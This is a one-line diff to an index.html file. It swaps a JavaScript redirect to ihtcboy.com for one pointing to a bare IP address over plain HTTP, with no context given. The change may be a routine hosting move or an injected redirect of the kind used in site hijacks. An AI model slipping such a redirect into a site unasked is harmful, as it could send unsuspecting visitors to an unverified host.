--- a/index.html
+++ b/index.html
@@ -1,1 +1,1 @@
-<script type="text/javascript">window.location.href="https://ihtcboy.com";</script>
+<script type="text/javascript">window.location.href="http://120.25.167.134/";</script>
